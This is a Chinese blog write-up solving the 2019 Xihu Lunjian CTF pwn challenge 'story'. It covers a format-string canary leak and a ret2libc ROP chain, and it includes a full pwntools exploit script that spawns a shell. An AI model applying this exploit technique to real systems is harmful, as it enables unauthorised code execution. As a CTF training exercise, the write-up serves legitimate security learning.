pwn-2019西湖论剑之story

最新推荐文章于 2023-02-18 18:38:53 发布
最新推荐文章于 2023-02-18 18:38:53 发布
阅读量751 收藏
点赞数
分类专栏: 题目篇
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CharlesGodX/article/details/89162963
版权

0x00:前言

这道题是64位程序,涉及到canary绕过,格式化字符串漏洞,是一道非常好的练习题

0x01:题目思路

首先检查保护,可以看到有堆栈不可执行和canary保护

Thunder_J@Thunder_J-virtual-machine:~/桌面$ checksec story 
[*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/story'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

一开始看以为是堆的题目,仔细一看是栈溢出,下面的函数可以看出,read函数存在栈溢出

unsigned __int64 __fastcall sub_400ABE(__int64 a1, unsigned __int64 a2)
{
  char buf; // [rsp+1Fh] [rbp-11h]
  unsigned __int64 i; // [rsp+20h] [rbp-10h]
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  for ( i = 0LL; i < a2; ++i )
  {
    buf = 0;
    if ( (signed int)read(0, &buf, 1uLL) < 0 )
    {
      puts("Read error!!\n");
      exit(1);
    }
    *(_BYTE *)(i + a1) = buf;
    if ( buf == 10 )
      break;
  }
  *(_BYTE *)(a1 + i) = 0;
  return __readfsqword(0x28u) ^ v5;
}

运行程序发现有canary保护,canary一般是存在于ret - 8的位置,我们先输入aaaaaaaa并找到输入的位置

gdb-peda$ find "aaaaaaaa"
Searching for 'aaaaaaaa' in: None ranges
Found 3 results, display max 3 items:
 [heap] : 0x603010 ("aaaaaaaa")
[stack] : 0x7fffffffbd80 ("aaaaaaaaell Your ID:")
[stack] : 0x7fffffffe420 ("aaaaaaaa")
gdb-peda$ x/20gx 0x7fffffffe420
0x7fffffffe420:	0x6161616161616161	0x0000000000000000 # esp - 0x10
0x7fffffffe430:	0x0000000000000000	0x00007ffff7a85439
0x7fffffffe440:	0x00007ffff7dd2620	0x00007ffff7a7cdbd
0x7fffffffe450:	0x0000000000000000	0xa9f67089f5d72800 # canary
0x7fffffffe460:	0x00007fffffffe4a0	0x00000000004008c6 # ret address (esp - 0x50)
0x7fffffffe470:	0x00007fffffffe588	0x0000000100000000
0x7fffffffe480:	0x0000000000400b70	0x0000000000400780
0x7fffffffe490:	0x00007fffffffe580	0xa9f67089f5d72800
0x7fffffffe4a0:	0x0000000000400b70	0x00007ffff7a2d830
0x7fffffffe4b0:	0x0000000000000001	0x00007fffffffe588

canary的位置也就是我们输入的位置加上 7 位,我们输入的内容偏移 8 位即是我们的aaaaaaaa,总共加起来也就是 %15$p,通过这一点我们便可以泄露 canary

gdb-peda$ r
Starting program: /home/Thunder_J/桌面/story 
Please Tell Your ID:aaaaaaaa %x %x %x %x %x %x %x %x %x %x
Hello aaaaaaaa ffffbd80 f7dd3780 f7b042c0 f7fdc700 6 f7dd2620 603010 61616161 20782520 78252078
gdb-peda$ r
Starting program: /home/Thunder_J/桌面/story 
Please Tell Your ID:aaaaaaaa %15$p
Hello aaaaaaaa 0xf77b92084307f000 # canary

接下来分三次发送payload,第一次我们通过puts函数打印__libc_start_main的got表内容,来计算libc基地址

payload = 'a'*136 + p64(canary) + 'b'*8 + p64(pop_rdi) + p64(elf.got['__libc_start_main'])+ p64(elf.plt['puts']) + p64(main)

第二次通过/bin/sh;%p来接收字符串/bin/sh的地址

payload2 = "/bin/sh;%p"

第三次就是调用system函数的内容,需要注意的是这是一个64位的程序,调用顺序与32位不同

payload3 = 'a'*136 + p64(canary) + 'q'*8 + p64(pop_rdi) + p64(binsh) + p64(sys_addr)

总的exp如下

from pwn import *

context.log_level = 'debug'

r = process('./story')
if args.G:
    gdb.attach(r)


elf = ELF('./story')
r.recvuntil(':')

r.sendline('%15$p')
r.recvuntil('Hello ')
canary = int(r.recvuntil('\n'),16)
print "canary is:" + hex(canary)
pop_rdi = 0x0000000000400bd3
main = 0x400876
sleep(0.1)
payload = 'a'*136 + p64(canary) + 'b'*8 + p64(pop_rdi) + p64(elf.got['__libc_start_main'])+ p64(elf.plt['puts']) + p64(main)
r.recvuntil('Tell me the size of your story:\n')
r.sendline('200')
r.recvuntil('You can speak your story:\n')
r.sendline(payload)
libc_start = u64(r.recv(6) + '\x00' + '\x00')
print "Libc_start_main is :" + hex(libc_start)
sys_addr = libc_start + 0x24c50
print "System is:" + hex(sys_addr)
payload2 = "/bin/sh;%p"
r.recvuntil('ID:')
r.sendline(payload2)
r.recvuntil("/bin/sh;")
binsh = int(r.recv()[0:15],16)
print "binsh addr is:" + hex(binsh)
r.sendline('200')
#r.recvuntil('You can speak your story:\n')
payload3 = 'a'*136 + p64(canary) + 'q'*8 + p64(pop_rdi) + p64(binsh) + p64(sys_addr) 
sleep(0.1)
r.sendline(payload3)
r.interactive()
Thunder_J
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
西湖论剑——pwn
weixin_44319142的博客
04-07 540
pwn 这道题目开了canary,和之前的套路相似,就是要泄露canary,利用栈溢出找到system和/bin/sh,拿到访问权限 看一下函数 printf存在格式化字符串漏洞可以用于泄漏canary p.sendlineafter("ID:","%15$p") #不解释了这个要打印的是第十五个参数,也就是canary的值 p.recvuntil("Hello ")#输出hello之后...
2020 西湖论剑 pwn noleakfmt
yongbaoii的博客
03-29 553
canary没开,方便溢出。 主逻辑简单。 格式化字符串漏洞。 给了我们一个栈地址,但是主要问题是把标准输出关掉了。 我们要利用的呢就是将_IO_2_1_stdout_的_fileno从1改成2,为啥呢? 对于一个FILE结构体来说,最重要的就是_flags和_fileno,_fileno存储的是我们的文件描述符,对于某些情况或许我们要劫持_fileno才能达到我们的目的,而_flags则标志了该FILE的一些行为,这对于我们的泄露至关重要。 我们想办法劫持结构体的_fileno之后就可以从标准错误做一.
2021 西湖论剑 pwn blind
yongbaoii的博客
03-26 603
利用ret2csu,覆盖alarm的got表最低一字节,通过爆破劫持alarm为syscall。 通过read函数的返回值让rax为0x5b,执行execve("/bin/sh", 0, 0) exp #/usr/env/bin python from pwn import * import time context.log_level = "debug" gadget1 = 0x4007ba gadget2 = 0x4007a0 elf = ELF('./blind') read_got = el.
2022西湖论剑pwn部分wp
N1rvana的博客
02-05 855
西湖论剑2022pwn
[BUUCTF-pwn] 西湖论剑_2018_小陈的笔记本加强版
weixin_52640415的博客
01-04 309
难度到是没啥难度,需要设计一下块的布置。 菜单题,有add,free,居然还有edit和show(这个很少见了),管理块0x90,在0x70放size和ptr,这样控制ptr就基本OK了。 漏洞点: readnb函数有off_by_null unsigned __int64 __fastcall sub_400B8B(__int64 a1, int a2) { char buf; // [rsp+1Fh] [rbp-11h] BYREF int i; // [rsp+20h] [rbp-1
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在本文中,我们将深入探讨2021年鹏城实验室的"Pwn-BabyHeap"挑战,这是一道涉及二进制安全和pwn技术的竞赛题目。本题主要考察了"off-by-null"漏洞的利用,这是一个在C语言编程中常见的安全问题。我们将围绕这个主题...
190407 逆向-西湖论剑
热门推荐
whklhhhh的博客
04-08 2万+
Re1-easyCpp IDA打开发现一大堆模板很丑,但仔细看一下其实只有一堆变量来回操作而已 基本上就是各种STL和vector的用法,算法名都保留下来了所以难度下降很多 基本流程是接收输入、生成斐波那契数列的十六项 然后对输入依次使用transform和accumulate算法 分别是遍历vector中的一元运算和二元运算 运算都是自定义的方法,双击算法进去可以看到lambda函数 tra...
2023西湖论剑pwn 部分wp
cainiao78777的博客
02-18 651
也就是*(&v3 + i) = v0 修改一个字节的内容,但是我们也要解一下这个方程,以免程序被exit()而且在buf的下面的变量都是能够覆盖的,也就是说,我们能通过覆盖 i 的值进行数组溢出。一个格式化字符串漏洞,一个栈溢出,但是只能副盖rbp和返回地址,所有要考虑栈迁移。我看有个大佬的解法很奇特,准备学习一下,待我学成,再来补充另外一种方法。泄露出这个函数地址,就能得到 libc——base。根据距离rbp的距离将相应的变量填入。这里的main指的是start,第二次getshell。
2019西湖论剑Storm_note
钞sir的博客
04-13 1万+
分析 这道题的漏洞不多,在edit note的时候有一个off_by_null漏洞: 然后还有一个后门: 没有show功能,想要泄露地址有难度;而且程序禁用了fastbin的申请: ssize_t init_proc() { ssize_t result; // rax int fd; // [rsp+Ch] [rbp-4h] setbuf(stdin, 0LL); setb...
西湖论剑逆向
qq_41071646的博客
04-09 539
其实可以石锤我是标题党了 哈哈哈 其实这个我也很尴尬 ·~ 没有题目 没办法好好的去做一下题 但是听说安恒会有复现 复现的时候能够好好做也是极好的 然后 先说一下这个题 题目 其实是在https://www.52pojie.cn/thread-924174-1-1.html这个链接下载的 多谢师傅的分享 其实 testre 这个题 很简单的一个题 就是 怎...
西湖论剑2020 pwn mmutag wp
weixin_45677731的博客
10-11 483
拿到题目,给了libc库,太可了,爱了爱了 开局malloc(0x68)输入姓名,这个0x68给人一种熟悉的感觉 程序会顺便输出保存着chunk指针的栈地址,暂时没发现有什么吊用 heap的部分,只有malloc和free的功能 并且固定申请0x68的chunk free这里,出现了经典的free之后未置0 而且还刚好是0x68的chunk 常见做法就是double free后劫持malloc_hook 然后就是泄露libc基地址 始终没找到什么好办法,泄露出来的栈地址看似也无法得到libc_base
Linux缓冲区保护机制
山高路远
04-10 3583
前言 为了更好地对缓冲区进行利用,十分有必要了解一下checksec所检查出的漏洞缓解措施都意味着什么 如图上所示,RELRO、Stack、NX、PIE四种保护机制,下方介绍时,括号里的是在Windows系统中的名称 以下主要来源于《从0到1CTFer成长之路》 一、NX(DEP) NX即是No-execute,不可执行。原理是通过现代操作系统的内存保护单元机制(MPU)对程序内存按页的粒度进行权限设置,其基本规则为可写权限与可执行权限互斥。因此开启了NX的程序代表着堆栈上写入的代码数据将不可被执行,也就
RELRO (ReLocation Read-Only)保护纯新手入门(一)
qq_66690477的博客
05-17 4486
RELRO,
攻防世界新——level3
weixin_62675330的博客
02-10 1429
攻防世界 – pwn新手区 level3 由题意可得可能跟libc有关。 ps:libc是Linux下的ANSI C的函数库。ANSI C是基本的C语言函数库,包含了C语言最基本的库函数。 引申: glibc 和 libc 都是 Linux 下的 C 函数库。 libc 是 Linux 下的 ANSI C 函数库;glibc 是 Linux 下的 GUN C 函数库。 1.checksec查看保护 文件有两个,一个是elf文件,一个是so文件。 ps:so文件(shared object),so文件是
2023西湖论剑复现
Luodehahajiang的博客
02-12 370
导出HTTP流,发现一个flag压缩包(有密码),找到解密算法。连接adb shell到目录data/system删除相应文件。结果分离出一个压缩包,mp3解出的就是压缩包密码。MP3stego分析一下,没有密码。分析觉得把黑白做01分离出来有东西。根据文件名47,rot47解密。重启后发现很多压缩包和两张图片。binwalk分离出一张图片。npbk文件,导入夜神模拟器。run一下或者F12。打开后发现有pin码。
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值